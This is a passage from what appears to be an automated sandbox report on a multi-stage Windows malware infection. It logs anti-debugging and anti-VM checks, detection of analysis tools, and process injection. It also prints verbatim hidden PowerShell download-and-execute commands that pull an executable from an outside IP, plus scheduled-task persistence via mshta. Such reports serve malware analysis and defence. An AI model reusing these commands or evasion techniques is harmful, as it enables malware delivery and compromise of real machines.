                                                Source: mshta.exe, 00000040.00000003.2242450929.0000000002758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BA82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                                                Source: mshta.exe, 00000020.00000003.2096505229.0000000002F29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ec
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BA82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                                                Source: powershell.exe, 00000023.00000002.2189896984.0000000007B8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.000000000075E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                                                Source: mshta.exe, 00000025.00000002.2156888222.0000023115B70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\z!
                                                Source: powershell.exe, 00000009.00000002.1468143447.000001DDD58FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                                                Source: rXOl0pp.exe, 00000019.00000003.2063180045.00000000053A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: E2/FvMCIGFG62TGOU
                                                Source: mshta.exe, 0000003C.00000003.2398840479.000001BBF89FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5~
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000B.00000002.1410046761.0000000000819000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000C.00000002.1440658928.00000000004A9000.00000040.00000001.01000000.0000000F.sdmp, rapes.exe, 0000000D.00000002.1443703711.00000000004A9000.00000040.00000001.01000000.0000000F.sdmp, TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000002.1457153178.0000000000819000.00000040.00000001.01000000.0000000B.sdmp, ILqcVeT.exe, 00000017.00000002.2388746724.00000000013AB000.00000040.00000001.01000000.00000013.sdmp, vertualiziren.exe, 00000018.00000002.2029919575.000000000058F000.00000040.00000001.01000000.00000014.sdmp, TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000002.2197219024.0000000000359000.00000040.00000001.01000000.0000001A.sdmp, TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000002.2294686273.0000000000359000.00000040.00000001.01000000.0000001A.sdmp, 7dbaa342f5.exe, 0000003E.00000002.2520912496.0000000000A5F000.00000040.00000001.01000000.0000001B.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                                Source: powershell.exe, 0000003A.00000002.2403168393.0000000007709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5ke\?ai3
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESystem information queried: ModuleInformationJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                                                Anti Debugging

                                                barindex
                                                Hides threads from debuggers
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEThread information set: HideFromDebuggerJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEThread information set: HideFromDebugger
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebugger
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeThread information set: HideFromDebugger
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeThread information set: HideFromDebugger
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeThread information set: HideFromDebugger
                                                Source: C:\ProgramData\jnxnee\benskvi.exeThread information set: HideFromDebugger
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEThread information set: HideFromDebugger
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEThread information set: HideFromDebugger
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeThread information set: HideFromDebugger
                                                Tries to detect sandboxes and other dynamic analysis tools (window names)
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeOpen window title or class name: regmonclass
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeOpen window title or class name: gbdyllo
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeOpen window title or class name: procmon_window_class
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeOpen window title or class name: ollydbg
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeOpen window title or class name: filemonclass
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeFile opened: NTICE
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeFile opened: SICE
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeFile opened: SIWVID
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEProcess queried: DebugPortJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEProcess queried: DebugPortJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEProcess queried: DebugPortJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeProcess queried: DebugPort
                                                Source: C:\ProgramData\jnxnee\benskvi.exeProcess queried: DebugPort
                                                Source: C:\ProgramData\jnxnee\benskvi.exeProcess queried: DebugPort
                                                Source: C:\ProgramData\jnxnee\benskvi.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeProcess queried: DebugPort
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXECode function: 11_2_04BD03B4 rdtsc 11_2_04BD03B4
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C8EAA2 BlockInput,0_2_00C8EAA2
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C42622
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C142DE
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C34CE8 mov eax, dword ptr fs:[00000030h]0_2_00C34CE8
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BE6092 mov eax, dword ptr fs:[00000030h]20_2_00BE6092
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDDC00 mov eax, dword ptr fs:[00000030h]20_2_00BDDC00
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CE6092 mov eax, dword ptr fs:[00000030h]21_2_00CE6092
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CDDC00 mov eax, dword ptr fs:[00000030h]21_2_00CDDC00
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C70B62
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C42622
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C3083F
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C309D5 SetUnhandledExceptionFilter,0_2_00C309D5
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C30C21
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDA245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00BDA245
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDA3A8 SetUnhandledExceptionFilter,20_2_00BDA3A8
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDEC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00BDEC0D
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BD995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00BD995A
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CDA245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00CDA245
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CD995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00CD995A
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CDEC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00CDEC0D
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeMemory protected: page guard

                                                HIPS / PFW / Operating System Protection Evasion

                                                barindex
                                                Yara detected Powershell download and execute
                                                Source: Yara matchFile source: amsi32_8132.amsi.csv, type: OTHER
                                                Source: Yara matchFile source: amsi64_7096.amsi.csv, type: OTHER
                                                Source: Yara matchFile source: amsi32_7196.amsi.csv, type: OTHER
                                                Source: Yara matchFile source: amsi64_3572.amsi.csv, type: OTHER
                                                Source: Yara matchFile source: amsi32_7836.amsi.csv, type: OTHER
                                                Source: Yara matchFile source: amsi32_6060.amsi.csv, type: OTHER
                                                Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 8020, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8132, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 6172, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: ILqcVeT.exe PID: 4156, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: rXOl0pp.exe PID: 8104, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 6608, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7196, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 7572, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3572, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 6124, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 5212, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 5784, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6060, type: MEMORYSTR
                                                Allocates memory in foreign processes
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
                                                Contains functionality to inject code into remote processes
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BB8070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,20_2_00BB8070
                                                Injects a PE file into a foreign processes
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
                                                Writes to foreign memory regions
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 299B008
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42A000
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42C000
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42D000
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C71201
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C52BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C52BA5
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C7B226 SendInput,keybd_event,0_2_00C7B226
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00C922DA
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE" Jump to behavior
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE" Jump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe "C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe "C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe "C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe "C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10111060121\am_no.cmd" "
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe "C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeProcess created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeProcess created: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe "C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "U6NDLmaxnYP" /tr "mshta \"C:\Temp\plDCQRtK9.hta\"" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\plDCQRtK9.hta"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
